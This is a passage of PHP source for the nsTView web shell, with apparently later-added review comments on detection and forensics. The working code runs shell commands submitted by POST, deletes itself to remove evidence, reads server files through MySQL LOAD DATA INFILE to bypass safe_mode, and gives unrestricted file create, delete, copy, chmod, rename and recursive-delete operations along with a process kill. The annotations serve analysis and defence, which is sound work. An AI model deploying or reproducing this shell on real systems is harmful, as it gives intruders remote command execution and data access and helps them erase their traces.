 620 print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
 621 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 622 }#end of mk ins
 623 }#end of ins new line
 624 
 625 
 626 
 627 
 628 
 629 
 630 if(isset($_GET['rename_table'])){
 631 $rename_table=$_GET['rename_table'];
 632 print "<br><br>Rename <b>$rename_table</b> to<br><br>
 633 <form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
 634 <input name=new_name size=30><center><br>
 635 <input type=submit value=Rename></center>
 636 </form>
 637 ";
 638 
 639 if(isset($_POST['new_name'])){
 640 mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
 641 mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
 642 print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
 643 print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
 644 }
 645 
 646 }#end of rename
 647 
 648 
 649 # dump table
 650 if($_GET['dump']){
 651 if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
 652 <font color=green><b>You can change temp folder for dump file in your browser!<br>
 653 <font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
 654 Then press enter</b></font>
 655 </font>");}
 656 mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
 657 $fp = fopen($f_d."/".$f,"w");
 658 fwrite($fp, "# nsTView.php v$ver
 659 # Web: http://nst.void.ru
 660 # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
 661 # MySQL version: ".mysql_get_server_info()."
 662 # PHP version: ".phpversion()."
 663 # Date: ".date("d.m.Y - H:i:s")."
 664 # Dump db ( $db ) Table ( $tbl )
 665 # --- eof ---
 666 
 667 ");
 668 $que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
 669 $row = mysql_fetch_row($que);
 670 fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
 671 $row[1]=str_replace("\n","\r\n",$row[1]);
 672 fwrite($fp, $row[1].";\r\n\r\n");
 673 $que = mysql_query("SELECT * FROM `$tbl`");
 674 if(mysql_num_rows($que)>0){
 675 while($row = mysql_fetch_assoc($que)){
 676 $keys = join("`, `", array_keys($row));
 677 $values = array_values($row);
 678 foreach($values as $k=>$v) {$values[$k] = adds2($v);}
 679 $values = implode("', '", $values);
 680 $sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
 681 fwrite($fp, $sql);
 682 }
 683 }
 684 fclose($fp);
 685 print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
 686 }#end of dump
 687 
 688 
 689 
 690 
 691 # db dump
 692 if($_GET['dump_db']){
 693 $c=mysql_num_rows(mysql_list_tables($db));
 694 if($c>=1){
 695 print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
 696 }else{
 697 print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
 698 die;
 699 }
 700 if(sizeof($tabs)==0){
 701 $res = mysql_query("SHOW TABLES FROM $db");
 702 if(mysql_num_rows($res)>0){
 703 while($row=mysql_fetch_row($res)){
 704 $tabs[] .= $row[0];
 705 }
 706 }
 707 }
 708 $fp = fopen($f_d."/".$f,"w");
 709 fwrite($fp, "# nsTView.php v$ver
 710 # Web: http://nst.void.ru
 711 # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
 712 # MySQL version: ".mysql_get_server_info()."
 713 # PHP version: ".phpversion()."
 714 # Date: ".date("d.m.Y - H:i:s")."
 715 # Dump db ( $db )
 716 # --- eof ---
 717 
 718 ");
 719 foreach($tabs as $tab) {
 720 fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
 721 $res = mysql_query("SHOW CREATE TABLE `$tab`");
 722 $row = mysql_fetch_row($res);
 723 $row[1]=str_replace("\n","\r\n",$row[1]);
 724 fwrite($fp, $row[1].";\r\n\r\n");
 725 $res = mysql_query("SELECT * FROM `$tab`");
 726 if(mysql_num_rows($res)>0){
 727 while($row=mysql_fetch_assoc($res)){
 728 $keys = join("`, `", array_keys($row));
 729 $values = array_values($row);
 730 foreach($values as $k=>$v) {$values[$k] = adds2($v);}
 731 $values = join("', '", $values);
 732 $sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
 733 fwrite($fp, $sql);
 734 }}
 735 fwrite($fp, "\r\n\r\n\r\n");
 736 }
 737 fclose($fp);
 738 print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
 739 }#end of db dump
 740 
 741 
 742 
 743 
 744 
 745 
 746 $vnutr=$_GET['vnutr'];
 747 $tbl=$_GET['tbl'];
 748 if($vnutr and !$_GET['ins_new_line']){
 749 print "<table cellpadding=0 cellspacing=1><tr><td>";
 750 
 751 mysql_select_db($db) or die(mysql_error());
 752 $c=mysql_query ("SELECT COUNT(*) FROM $tbl");
 753 $cfa=mysql_fetch_array($c);
 754 mysql_free_result($c);
 755 print "
 756 Total: $cfa[0]
 757 <form>
 758 From: <input name=from size=3 value=0>
 759 To: <input name=to size=3 value='$cfa[0]'>
 760 <input type=submit name=show value=Show>
 761 <input type=hidden name=vnutr value=1>
 762 <input type=hidden name=vn value='$vn'>
 763 <input type=hidden name=db value='$db'>
 764 <input type=hidden name=login value='$login'>
 765 <input type=hidden name=pass value='$pass'>
 766 <input type=hidden name=adress value='$adress'>
 767 <input type=hidden name=conn value=1>
 768 <input type=hidden name=baza value=1>
 769 <input type=hidden name=p value=sql>
 770 <input type=hidden name=tbl value='$tbl'>
 771  [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
 772 </form></td></tr></table>";
 773 $vn=$_GET['vn'];
 774 $from=$_GET['from'];
 775 $to=$_GET['to'];
 776 $from=$_GET['from'];
 777 $to=$_GET['to'];
 778 if(!isset($from)){$from=0;}
 779 if(!isset($to)){$to=50;}
 780 $query = "SELECT * FROM $vn LIMIT $from,$to";
 781 $result = mysql_query($query);
 782 $result1= mysql_query($query);
 783 print $del_result;
 784 print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
 785 for ($i=0;$i<mysql_num_fields($result);$i++){
 786 $name=mysql_field_name($result,$i);
 787 $type  = mysql_field_type($result, $i);
 788 $len  = mysql_field_len($result, $i);
 789 print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
 790 }
 791 print "</tr><pre>";
 792 
 793 while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
 794 foreach($mn as $key=>$inside){
 795 $buffer1 .= "`$key`='".adds($inside)."' AND ";
 796 $b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
 797 }
 798 $buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
 799 $buffer1  = base64_encode($buffer1);
 800 print "<td>
 801 <form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
 802 <input type=hidden name=delete_row value='$buffer1'>
 803 <input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
 804 </form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
 805 <input type=hidden name=edit_row value='$buffer1'>
 806 <input type=submit value=Edit style='border:1px;background-color:green;'>
 807 </form>
 808 </td>\r\n";
 809 print $b1;
 810 print "</tr>";
 811 unset($b1);
 812 unset($buffer1);
 813 }
 814 
 815 
 816 
 817 mysql_free_result($result);
 818 print "</table>";
 819 } #end vnutr
 820 print "</td></tr></table>";
 821 } # end $conn
 822 
 823 
 824 
 825 ####   end of sql
 826 print "</tr></td></table> </td></tr></table>";
 827 print $copyr;
 828 die;
 829 }
 830 
 831 
 832 @$p=$_GET['p'];
     # Self-removal, step 1 of 2: for ?p=selfremover, print a confirmation page that
     # shows this script's own path (__FILE__) and links to ?p=yes, then stop.
 833 if(@$_GET['p']=="selfremover"){
 834         print "<tr><td>";
 835 print "<font color=red face=verdana size=1>Are you sure?<br>
 836 <a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
 837 Remove: <u>";
 838 $path=__FILE__;
 839 print $path;
 840 print " </u>?</td></tr></table>";
 841 die;
 842 }
 843 
     # Self-removal, step 2 of 2: ?p=yes deletes the running script from disk.
     # Nothing in this branch checks that step 1 was shown first; the GET value alone
     # triggers the unlink.
     # NOTE(review, incident response): once this branch has run, the file is gone, so
     # a clean docroot does not show the script was never present. Requests carrying
     # p=selfremover or p=yes would normally be visible in the web access log.
 844 if($p=="yes"){
 845 $path=__FILE__;
     # @ suppresses any unlink() error; the outcome is inferred from file_exists() below.
 846 @unlink($path);
 847 $path=str_replace("\\","/",$path);
 848 if(file_exists($path)){$hmm="NOT DELETED!!!";
 849 print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
 850 }else{$hmm="DELETED";}
 851 print "<script>alert('$path $hmm');</script>";
 852 
 853 }
 854 
 855 
 856 
 857 if($os=="unix"){
     # fastcmd() is declared only when $os is "unix" ($os is set outside this excerpt).
     # It prints a <select name=sh3> built from the $fast_commands list: each entry is
     # "label (nst) command", the label becomes the option text and the command becomes
     # the option value. The field name sh3 is the same POST field that the command
     # pages in this file pass to a backtick shell call, so choosing an entry submits
     # that command string for execution.
 858 function fastcmd(){
 859 global $fast_commands;
     # "Total commands" is the number of "\n"-separated lines minus 2.
 860 $c_f=explode("\n",$fast_commands);
 861 $c_f=count($c_f)-2;
 862 print "
 863 <form method=post>
 864 Total commands: $c_f<br>
 865 <select name=sh3>";
 866 
     # One pass per " (nst) " separator found. The list is re-split on "\r\n" on every
     # iteration (a different separator from the "\n" used for the count above).
 867 $c=substr_count($fast_commands," (nst) ");
 868 for($i=0; $i<=$c; $i++){
 869        $expl2=explode("\r\n",$fast_commands);
 870         $expl=explode(" (nst) ",$expl2[$i]);
     # Entries with an empty command part are skipped. Neither the value nor the label
     # is HTML-escaped before being printed.
 871         if(trim($expl[1])!=""){
 872         print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
 873    }
 874 }
 875 
 876 print "</select><br>
 877 <input type=submit value=Exec>
 878 </form>
 879 ";
 880 }
 881 }#end of os unix
 882 
 883 
 884 if($os=="win"){
     # Windows counterpart of fastcmd(): declared only when $os is "win", and identical
     # in structure to the unix variant except that it reads $fast_commands_win
     # (defined outside this excerpt). The <select> is again named sh3, the POST field
     # that the command pages in this file hand to a backtick shell call.
 885 function fastcmd(){
 886 global $fast_commands_win;
     # "Total commands" is the number of "\n"-separated lines minus 2.
 887 $c_f=explode("\n",$fast_commands_win);
 888 $c_f=count($c_f)-2;
 889 print "
 890 <form method=post>
 891 Total commands: $c_f<br>
 892 <select name=sh3>";
 893 
     # One pass per " (nst) " separator; the list is re-split on "\r\n" each iteration.
 894 $c=substr_count($fast_commands_win," (nst) ");
 895 for($i=0; $i<=$c; $i++){
 896        $expl2=explode("\r\n",$fast_commands_win);
 897         $expl=explode(" (nst) ",$expl2[$i]);
     # Entries with an empty command part are skipped; output is not HTML-escaped.
 898         if(trim($expl[1])!=""){
 899         print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
 900    }
 901 }
 902 
 903 print "</select><br>
 904 <input type=submit value=Exec>
 905 </form>
 906 ";
 907 }
 908 }#end of os win
 909 
 910 
 911 echo "
 912 <tr><td>";
     # Command page, variant 1 (?sh311=1). It changes into $d ($d is set outside this
     # excerpt), prints the working directory and the fastcmd() picker, then a free-text
     # input named sh3. Unlike variant 2 below, this branch does not exit afterwards.
 913 if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
 914 ";
 915 chdir($d);
 916 echo getcwd()."<br><br>
 917 Fast cmd:<br>";
 918 fastcmd();
 919 if($os=="win"){$d=str_replace("/","\\\\",$d);}
 920 print "
 921 <a href=\"javascript:cwd('$d ')\">Insert pwd</a>
 922 <form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
 923 ";
     # Core capability of the page: the POST field sh3 is handed unchanged to the
     # backtick operator, i.e. run by the system shell as the PHP process user, and the
     # output is printed inside <pre>. No validation or escaping is applied here.
     # NOTE(review, detection): the observable effects are a shell started as a child
     # of the web server / PHP worker, and POST requests to this script with sh311 in
     # the query string and an sh3 body field.
 924 if(@$_POST['sh3']){
 925 $sh3=$_POST['sh3'];
 926 echo "<pre>";
 927 print `$sh3`;
 928 echo "</pre>";
 929 }
 930 }
 931 
 932 if(@$_GET['sh311']=="2"){
     # Command page, variant 2 (?sh311=2). Same flow as variant 1: chdir($d), show the
     # working directory and the fastcmd() picker, then execute POST sh3. The
     # difference visible here is that this branch prints $copyr and exits.
 933 echo "<center>cmd<br>
 934 pwd:
 935 ";
 936 chdir($d);
 937 echo getcwd()."<br><br>
 938 Fast cmd:<br>";
 939 fastcmd();
 940 if($os=="win"){$d=str_replace("/","\\\\",$d);}
 941 print "
 942 <a href=\"javascript:cwd('$d ')\">Insert pwd</a>
 943 <form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
     # POST sh3 is passed unchanged to the backtick operator (system shell, PHP process
     # user) and its output printed. No validation or escaping is applied here.
 944 if(@$_POST['sh3']){
 945 $sh3=$_POST['sh3'];
 946 echo "<pre>"; print `$sh3`; echo "</pre>";}
 947 echo $copyr;
 948 exit;}
 949 
 950 if(@$_GET['delfl']){
     # Confirmation page for recursive folder deletion. The "Yes" link carries the
     # folder as ?deldir=1&dir=..., which is the parameter pair the deldir handler in
     # this file acts on. The delfolder and rback GET values are written into the HTML
     # without escaping.
 951 @$delfolder=$_GET['delfolder'];
 952 echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
 953 (All files must be writable)<br>
 954 <a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
 955 ";
 956 echo $copyr;
 957 exit;
 958 }
 959 
 960 
 961 $mkdir=$_GET['mkdir'];
     # Create-folder page, shown when ?mkdir is set. The new directory is $d joined
     # with the POST field dir_n; the name is used as submitted, so nothing here keeps
     # it inside $d (path separators and ".." are not filtered). On failure the script
     # dies with the submitted name echoed back unescaped.
 962 if($mkdir){
 963 print "<br><b>Create Folder in $d :</b><br><br>
 964 <form method=post>
 965 New folder name:<br>
 966 <input name=dir_n size=30>
 967 </form><br>
 968 ";
 969 if($_POST['dir_n']){
 970 mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
 971 print "<b><font color=green>Directory created success!</font></b>";
 972 }
 973 print $copyr;
 974 die;
 975 }
 976 
 977 
 978 $mkfile=$_GET['mkfile'];
     # Create-file page, shown when ?mkfile is set. The target is $d joined with the
     # POST field file_n, used as submitted (no filtering of path separators or "..",
     # no restriction on extension - the form's own example includes hello.php).
 979 if($mkfile){
 980 print "<br><b>Create file in $d :</b><br><br>
 981 <form method=post>
 982 File name:<br>
 983 (example: hello.txt , hello.php)<br>
 984 <input name=file_n size=30>
 985 </form><br>
 986 ";
 987 if($_POST['file_n']){
     # Mode "w" creates the file or truncates an existing one to zero length; an empty
     # string is then written. The handle is not closed in this block.
 988 $fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
 989 fwrite($fp,"");
 990 print "<b><font color=green>File created success!</font></b>";
 991 }
 992 print $copyr;
 993 die;
 994 }
 995 
 996 
 997 $ps_table=$_GET['ps_table'];
     # Process list / kill page, shown when ?ps_table is set.
 998 if($ps_table){
 999 
     # The POST field kill_p is concatenated into a shell command line without
     # escaping; nothing here restricts it to a numeric PID.
1000 if($_POST['kill_p']){
1001 exec("kill -9 ".$_POST['kill_p']);
1002 }
1003 
     # `ps aux` is run through the shell via backticks and its output parsed below.
     # NOTE(review, detection): both calls show up as ps / kill processes started by
     # the web server or PHP worker account.
1004 $str=`ps aux`;
1005 
1006 # You can put here preg_match_all for other distrib/os
     # Captures: [1] a run of 1-7 digits (used as the PID), [3] the text after a
     # "d:dd" time field (used as the command column).
1007 preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
1008 
1009 
1010 print "<br><b>PS Table :: Fast kill program<br>
1011 (p.s: Tested on Linux slackware 10.0)<br>
1012 <br></b>";
1013 print "<center><table border=1>";
     # One table row per match, each with a submit button named kill_p whose value is
     # the captured PID. Process names are printed without HTML escaping.
1014 for($i=0; $i<count($matches[3]); $i++){
1015 $expl=explode(" ",$matches[0][$i]);
1016 print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
1017 }#end of for
1018 print "</table></center><br><br>";
1019 unset($str);
1020 print $copyr;
1021 die;
1022 }#end of ps table
1023 
1024 
1025 $read_file_safe_mode=$_GET['read_file_safe_mode'];
     # File read through a MySQL server instead of PHP's own file functions; the page
     # text states the purpose as working while safe_mode / open_basedir are on. The
     # file is read by the database server process, not by PHP.
     # NOTE(review, mitigation): this only works for a database account allowed to run
     # LOAD DATA INFILE and create databases; web application accounts normally need
     # neither, and MySQL's secure_file_priv setting limits where such loads may read.
1026 if($read_file_safe_mode){
1027 
1028 if(!isset($_POST['l'])){$_POST['l']="root";}
1029 
     # The login and password POST values are written back into the form unescaped.
1030 print "<br>
1031 Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
1032 <form method=post>
1033 <table>
1034 <tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
1035 <tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
1036 <tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
1037 (example: /etc/hosts)<br>
1038 <input name=read_file size=45><br>
1039 <input type=submit value='Show content'>
1040 </form>
1041 <br>";
1042 
1043 if($_POST['read_file']){
1044 $read_file=$_POST['read_file'];
     # Sequence: connect with the POSTed host/port/login/password, create database
     # tmp_bd_file, create table tmp_file (one LONGBLOB column), load the requested
     # path into it, print every row HTML-escaped, then drop the database.
     # NOTE(review, forensics): the fixed names tmp_bd_file and tmp_file appear in the
     # statements sent to the server. The drop happens only at the end, so any die()
     # after the create step leaves the database behind. The LOAD DATA call itself has
     # no "or die", so a failed load simply yields an empty result.
1045 @mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
1046 mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
1047 mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
1048 mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
1049 mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
1050 $query = "SELECT * FROM tmp_file";
1051 $result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
1052 print "<b>File content</b>:<br><br>";
     # $name is assigned in this loop but not used afterwards in this block.
1053 for($i=0;$i<mysql_num_fields($result);$i++){
1054 $name=mysql_field_name($result,$i);}
1055 while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
1056 foreach ($line as $key =>$col_value) {
1057 print htmlspecialchars($col_value)."<br>";}}
1058 mysql_free_result($result);
1059 mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
1060 }
1061 
1062 
1063 print $copyr;
1064 die;
1065 }#end of read_file_safe_mode
1066 
1067 
1068 # sys
1069 $wich_f=$_GET['wich_f'];
1070 $delete=$_GET['delete'];
1071 $del_f=$_GET['del_f'];
1072 $chmod=$_GET['chmod'];
1073 $ccopy_to=$_GET['ccopy_to'];
     # The five values above are taken straight from the query string and drive the
     # file operations (delete, copy, chmod, rename) that follow in this file.
1074 
1075 
1076 # delete
     # Two-step file delete. Without ?delete the page asks for confirmation; with
     # delete=1 it unlinks $d joined with del_f. The return value of unlink() is not
     # checked, so "DELETED!" is printed whether or not the file was removed. The
     # path pieces are printed into the HTML unescaped.
1077 if(@$_GET['del_f']){
1078 if(!isset($delete)){
1079 print "<font color=red>Delete this file?</font><br>
1080 <b>$d/$wich_f<br><br></b>
1081 <a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
1082 ";}
1083 if($delete==1){
1084 unlink($d."/".$del_f);
1085 print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
1086 <br><b> <a href='$php_self?d=$d'># BACK</a>
1087 ";
1088 }
1089 echo $copyr;
1090 exit;
1091 }
1092 
1093 
1094 # copy to
1095 if($ccopy_to){
     # Copy-file page. The form is pre-filled from $d and the ccopy_to GET value (the
     # suggested destination gets an "nst_" name prefix), but the copy itself uses the
     # POSTed wich_f and to_f exactly as submitted, so source and destination can be
     # any paths the PHP process can read and write.
1096 $wich_f=$_POST['wich_f'];
1097 $to_f=$_POST['to_f'];
1098 print "<font color=green>Copy file:<br>
1099 $d/$ccopy_to</font><br>
1100 <br>
1101 <form method=post>
1102 File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
1103 To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
1104 <input type=submit value=Copy></form><br><br>
1105 ";
1106 
1107 if($to_f){
     # @ hides the PHP warning; a failed copy ends the script with the message below.
1108 @copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
1109 print "<font color=green><b>Copy success!!!</b></font><br>";
1110 }
1111 
1112 echo $copyr;
1113 exit;
1114 }
1115 
1116 
1117 # chmod
1118 if(@$_GET['chmod']){
1119 $perms = @fileperms($d."/".$wich_f);
1120 print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
1121 <br><center>This file chmod is</b> ";
1122 print perm($perms);
1123 print "</center>
1124 <br>";
1125 $chmd=<<<HTML
1126 
1127 <script>
1128 <!--
1129 
1130 function do_chmod(user) {
1131         var field4 = user + "4";
1132         var field2 = user + "2";
1133         var field1 = user + "1";
1134         var total = "t_" + user;
1135         var symbolic = "sym_" + user;
1136         var number = 0;
1137         var sym_string = "";
1138 
1139         if (document.chmod[field4].checked == true) { number += 4; }
1140         if (document.chmod[field2].checked == true) { number += 2; }
1141         if (document.chmod[field1].checked == true) { number += 1; }
1142 
1143         if (document.chmod[field4].checked == true) {
1144                 sym_string += "r";
1145         } else {
1146                 sym_string += "-";
1147         }
1148         if (document.chmod[field2].checked == true) {
1149                 sym_string += "w";
1150         } else {
1151                 sym_string += "-";
1152         }
1153         if (document.chmod[field1].checked == true) {
1154                 sym_string += "x";
1155         } else {
1156                 sym_string += "-";
1157         }
1158 
1159         if (number == 0) { number = ""; }
1160         document.chmod[total].value = number;
1161         document.chmod[symbolic].value = sym_string;
1162 
1163         document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
1164         document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
1165 }
1166 //-->
1167 </script>
1168 
1169 
1170 
1171 <form name="chmod" method=post>
1172 <p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
1173         <tr bgcolor="gray">
1174                 <td align="left"><b>Permission</b></td>
1175                 <td align="center"><b>Owner</b></td>
1176                 <td align="center"><b>Group</b></td>
1177                 <td align="center"><b>Other</b></td>
1178                 <td bgcolor="#dddddd" rowspan="4"> </td>
1179         </tr><tr bgcolor="#dddddd">
1180                 <td align="left" nowrap><b>Read</b></td>
1181                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
1182                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
1183                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
1184         </tr><tr bgcolor="#dddddd">
1185                 <td align="left" nowrap><b>Write</b></td>
1186                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
1187                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
1188                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
1189         </tr><tr bgcolor="#dddddd">
1190                 <td align="left" nowrap><b>Execute</b></td>
1191                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
1192                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
1193                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
1194         </tr><tr bgcolor="#dddddd">
1195                 <td align="right" nowrap>Octal:</td>
1196                 <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
1197                 <td align="center"><input type="text" name="t_group" value="" size="1"></td>
1198                 <td align="center"><input type="text" name="t_other" value="" size="1"></td>
1199                 <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
1200         </tr><tr bgcolor="#dddddd">
1201                 <td align="right" nowrap>Symbolic:</td>
1202                 <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
1203                 <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
1204                 <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
1205                 <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
1206         </tr>
1207 </table></td></tr></table></p>
1208 HTML;
1209 
1210 print "<center>".$chmd."
1211 
1212 <b>$d/$wich_f</b><br><br>
1213 <input type=submit value=CHMOD></form>
1214 </center>
1215 </form>
1216 ";
1217 $t_total=$_POST['t_total'];
     # Applies the mode typed into the form's t_total field to $d joined with $wich_f.
     # The result of chmod() is not checked before "Now chmod is ..." is printed.
     # NOTE(review, forensics): t_total arrives as a string such as "777", and PHP's
     # chmod() does not treat its mode argument as octal automatically, so the mode
     # actually set may differ from the digits in the request. Check the file's real
     # permissions rather than relying on the logged value.
1218 if($t_total){
1219 chmod($d."/".$wich_f,$t_total);
1220 print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
1221 print "<a href='$php_self?d=$d'># BACK</a><br><br>";
1222 }
1223 echo $copyr;
1224 exit;
1225 }
1226 
1227 # rename
1228 if(@$_GET['rename']){
     # Rename page. Source is $d joined with $wich_f (from the query string), target is
     # $d joined with the POST field rto; doubled slashes are collapsed once in each.
     # rto is used as submitted, so it may contain path separators and thereby move the
     # file outside $d. The return value of rename() is not checked.
1229 print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
1230 <center>
1231 <form method=post>
1232 <b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
1233 <input name=rto size=40 value='$wich_f'><br><br>
1234 <input type=submit value=RENAME>
1235 </form>
1236 ";
1237 
1238 @$rto=$_POST['rto'];
1239 
1240 if($rto){
1241 $fr1=$d."/".$wich_f;
1242 $fr1=str_replace("//","/",$fr1);
1243 $to1=$d."/".$rto;
1244 $to1=str_replace("//","/",$to1);
1245 
1246 rename($fr1,$to1);
1247 print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
1248 
     # After 3 seconds the browser is sent back to this rename page for the new name.
1249 echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
1250 
1251 }
1252 
1253 echo $copyr;
1254 exit;
1255 }
1256 
1257 
1258 
1259 
1260 if(@$_GET['deldir']){
     # Recursive directory delete. The starting directory comes directly from the dir
     # GET parameter and is not tied to $d or to any base path, so it can name any
     # directory the PHP process is able to modify.
1261 @$dir=$_GET['dir'];
     # deldir($dir): walks the directory, recursing into sub-directories and unlinking
     # everything else, then removes the directory itself. Every filesystem call is
     # prefixed with @, so failures are silent. Returns true when the final rmdir()
     # succeeded; otherwise $success was never set and the (suppressed) read yields null.
1262 function deldir($dir)
1263 {
1264 $handle = @opendir($dir);
1265 while (false!==($ff = @readdir($handle))){
